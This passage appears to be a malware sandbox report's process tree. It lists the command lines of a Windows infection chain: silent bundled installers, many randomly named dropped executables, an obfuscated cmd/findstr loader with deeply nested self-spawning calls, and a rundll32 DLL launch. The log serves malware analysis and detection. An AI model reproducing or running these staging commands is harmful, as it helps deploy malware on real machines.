"C:\Users\Admin\AppData\Local\Temp\is-B71VM.tmp\ultramediaburner.tmp" /SL5="$30366,281924,62464,C:\Program Files\Windows Mail\SWPFFCTIHD\ultramediaburner.exe" /VERYSILENT
9⤵
PID:5524

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:5272

C:\Users\Admin\AppData\Local\Temp\1e-e7945-7b7-8c1a7-7264dd8a20005\Qatubucuby.exe
"C:\Users\Admin\AppData\Local\Temp\1e-e7945-7b7-8c1a7-7264dd8a20005\Qatubucuby.exe"
8⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\d5-aac54-94a-212ba-58e85dbe35563\Gefomuxaele.exe
"C:\Users\Admin\AppData\Local\Temp\d5-aac54-94a-212ba-58e85dbe35563\Gefomuxaele.exe"
8⤵
PID:1760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phurqg33.j2o\GcleanerEU.exe /eufive & exit
9⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\phurqg33.j2o\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\phurqg33.j2o\GcleanerEU.exe /eufive
10⤵
PID:1176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vacuo2ls.whn\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:6748

C:\Users\Admin\AppData\Local\Temp\vacuo2ls.whn\installer.exe
C:\Users\Admin\AppData\Local\Temp\vacuo2ls.whn\installer.exe /qn CAMPAIGN="654"
10⤵
PID:8152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obnk5iyf.huf\ufgaa.exe & exit
9⤵
PID:2656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe & exit
9⤵
PID:3852

C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe
C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe
10⤵
PID:7640

C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe" -q
11⤵
PID:6632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1oac0hi.ssq\gcleaner.exe /mixfive & exit
9⤵
PID:3004

C:\Users\Admin\AppData\Local\Temp\b1oac0hi.ssq\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\b1oac0hi.ssq\gcleaner.exe /mixfive
10⤵
PID:2836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z531d2oe.ntu\autosubplayer.exe /S & exit
9⤵
- Executes dropped EXE
PID:2216

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
5⤵
PID:3352

C:\Users\Admin\AppData\Roaming\2510032.exe
"C:\Users\Admin\AppData\Roaming\2510032.exe"
6⤵
PID:5300

C:\Users\Admin\AppData\Roaming\8843517.exe
"C:\Users\Admin\AppData\Roaming\8843517.exe"
6⤵
PID:5452

C:\Users\Admin\AppData\Roaming\3827320.exe
"C:\Users\Admin\AppData\Roaming\3827320.exe"
6⤵
PID:5552

C:\Users\Admin\AppData\Roaming\7229834.exe
"C:\Users\Admin\AppData\Roaming\7229834.exe"
6⤵
PID:5620

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
5⤵
PID:4864

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
6⤵
PID:5828

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
5⤵
PID:5088

C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe
"C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe"
6⤵
PID:4296

C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe
C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe
7⤵
PID:4796

C:\Users\Admin\Documents\9DMEsggkl8MTL2huvJ6Euy07.exe
"C:\Users\Admin\Documents\9DMEsggkl8MTL2huvJ6Euy07.exe"
6⤵
PID:4540

C:\Users\Admin\Documents\Liztm33t8Q5Qf3Wz7LmWdax3.exe
"C:\Users\Admin\Documents\Liztm33t8Q5Qf3Wz7LmWdax3.exe"
6⤵
PID:4724

C:\Users\Admin\AppData\Roaming\7088794.exe
"C:\Users\Admin\AppData\Roaming\7088794.exe"
7⤵
PID:7164

C:\Users\Admin\AppData\Roaming\8319135.exe
"C:\Users\Admin\AppData\Roaming\8319135.exe"
7⤵
PID:3132

C:\Users\Admin\Documents\NBDyHGx3z1ZBLUAXnk2ebshQ.exe
"C:\Users\Admin\Documents\NBDyHGx3z1ZBLUAXnk2ebshQ.exe"
6⤵
PID:3352

C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
"C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe"
6⤵
PID:6148

C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
7⤵
PID:2660

C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
7⤵
PID:1924

C:\Users\Admin\Documents\Lx_yrGHtmPYaqhORiUUaWKRV.exe
"C:\Users\Admin\Documents\Lx_yrGHtmPYaqhORiUUaWKRV.exe"
6⤵
PID:4804

C:\Users\Admin\Documents\BJqagyxIDgj_BtcfoZLXNv4M.exe
"C:\Users\Admin\Documents\BJqagyxIDgj_BtcfoZLXNv4M.exe"
6⤵
PID:4512

C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe
"C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe"
6⤵
PID:4824

C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe
"C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe"
7⤵
PID:9968

C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe
"C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe"
6⤵
PID:4744

C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe
C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe
7⤵
PID:6808

C:\Users\Admin\Documents\nwGeIPBAQdLcWt67CG9rbarT.exe
"C:\Users\Admin\Documents\nwGeIPBAQdLcWt67CG9rbarT.exe"
6⤵
PID:6732

C:\Users\Admin\Documents\q9badR7Ps0ya2QFLYouM_39T.exe
"C:\Users\Admin\Documents\q9badR7Ps0ya2QFLYouM_39T.exe"
6⤵
PID:6784

C:\Users\Admin\AppData\Local\Temp\is-B7N9I.tmp\q9badR7Ps0ya2QFLYouM_39T.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B7N9I.tmp\q9badR7Ps0ya2QFLYouM_39T.tmp" /SL5="$7010E,138429,56832,C:\Users\Admin\Documents\q9badR7Ps0ya2QFLYouM_39T.exe"
7⤵
PID:7156

C:\Users\Admin\AppData\Local\Temp\is-S0OG8.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-S0OG8.tmp\Setup.exe" /Verysilent
8⤵
PID:6700

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
9⤵
PID:6780

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629273115 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
10⤵
PID:8472

C:\Users\Admin\Documents\mepdAk3OZkF97VMiCyKFfcBj.exe
"C:\Users\Admin\Documents\mepdAk3OZkF97VMiCyKFfcBj.exe"
6⤵
PID:6876

C:\Users\Admin\Documents\LcnqHiXOYcHB_CdivX5Or_rU.exe
"C:\Users\Admin\Documents\LcnqHiXOYcHB_CdivX5Or_rU.exe"
6⤵
PID:6612

C:\Users\Admin\Documents\XJRT9CME3AEWgf0B3CtQSRs5.exe
"C:\Users\Admin\Documents\XJRT9CME3AEWgf0B3CtQSRs5.exe"
6⤵
PID:6604

C:\Users\Admin\Documents\OYyz1M6bnpnDeCLMR7qNJUcO.exe
"C:\Users\Admin\Documents\OYyz1M6bnpnDeCLMR7qNJUcO.exe"
6⤵
PID:6516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 760
7⤵
- Program crash
PID:7660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 812
7⤵
- Program crash
PID:7852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 816
7⤵
- Program crash
PID:8080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 824
7⤵
- Program crash
PID:7300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 868
7⤵
- Program crash
PID:7524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1100
7⤵
- Program crash
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1116
7⤵
- Program crash
PID:7932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1408
7⤵
- Program crash
PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1396
7⤵
- Program crash
PID:8144

C:\Users\Admin\Documents\vuknjgI9yxbnXNQcxSUwHaiV.exe
"C:\Users\Admin\Documents\vuknjgI9yxbnXNQcxSUwHaiV.exe"
6⤵
PID:6508

C:\Users\Admin\Documents\OqvuInXq4AUg4mm4fRIR7jTs.exe
"C:\Users\Admin\Documents\OqvuInXq4AUg4mm4fRIR7jTs.exe"
6⤵
PID:6492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 664
7⤵
- Program crash
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 632
7⤵
- Program crash
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 752
7⤵
- Program crash
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 1124
7⤵
- Program crash
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 1156
7⤵
- Program crash
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 1172
7⤵
- Program crash
PID:6244

C:\Users\Admin\Documents\hxn57bXtgtUxcJHa58cujkXu.exe
"C:\Users\Admin\Documents\hxn57bXtgtUxcJHa58cujkXu.exe"
6⤵
PID:6500

C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe
"C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe"
6⤵
PID:6404

C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe
"C:\Users\Admin\Documents\XQHg1mmrwLDdBxlCGfjzmonS.exe" -q
7⤵
PID:3012

C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
5⤵
PID:4200

C:\Users\Admin\AppData\Local\Temp\tmp30DB_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp30DB_tmp.exe"
6⤵
PID:4076

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
7⤵
PID:6552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
7⤵
PID:4928

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:4584

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
9⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
9⤵
PID:7328

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
10⤵
PID:7208

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
11⤵
PID:7336

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
12⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
13⤵
PID:7116

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
14⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
15⤵
PID:3340

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
16⤵
PID:8444

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
17⤵
PID:8820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
18⤵
PID:9148

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
19⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
20⤵
PID:8752

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
21⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
22⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
23⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
24⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
25⤵
PID:8476

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
26⤵
PID:8656

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
27⤵
PID:9092

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
28⤵
PID:8752

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
29⤵
PID:7644

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
30⤵
PID:8956

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
31⤵
PID:4604

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
32⤵
PID:8760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
33⤵
PID:8692

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
34⤵
PID:9148

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
35⤵
PID:8976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
36⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
37⤵
PID:9052

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
38⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
39⤵
PID:6488

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
40⤵
PID:7460

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
41⤵
PID:4028

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
42⤵
PID:8252

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
43⤵
PID:8364

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
44⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
45⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
46⤵
PID:8972

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
47⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
48⤵
PID:8332

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
49⤵
PID:8348

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
50⤵
PID:9072

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
51⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
52⤵
PID:8324

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
53⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
54⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
55⤵
PID:7952

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
56⤵
PID:7592

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
57⤵
PID:8960

C:\Windows\SysWOW64\PING.EXE
ping RJMQBVDN -n 30
9⤵
- Runs ping.exe
PID:7388

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6188

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:6560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:64

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5532

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5532 -s 496
2⤵
- Program crash
PID:6264

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5236

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D592C6EA5D059E3009A9E98343973CA4 C
2⤵
PID:5588

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9B0966B8C2621AD2847D818F4080D694 C
2⤵
PID:5340

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 21B5A5F3385E9A790BF83DA1D6B99A5B
2⤵
PID:6724

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9F03233409AE1A3FDBBAD2E971E88F4B C
2⤵
PID:7988

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
2⤵
PID:7592

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
3⤵
PID:6600

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
4⤵
PID:5952

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b0,0x1e8,0x7ff8426fdec0,0x7ff8426fded0,0x7ff8426fdee0
5⤵
PID:9080

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=1700 /prefetch:8
5⤵
PID:476

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --mojo-platform-channel-handle=2124 /prefetch:8
5⤵
PID:4776

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:2
5⤵
PID:5124

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2488 /prefetch:1
5⤵
PID:3076

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,9712789431296149727,2869718879009852737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5952_663533427" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2464 /prefetch:1
5⤵
PID:6788

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
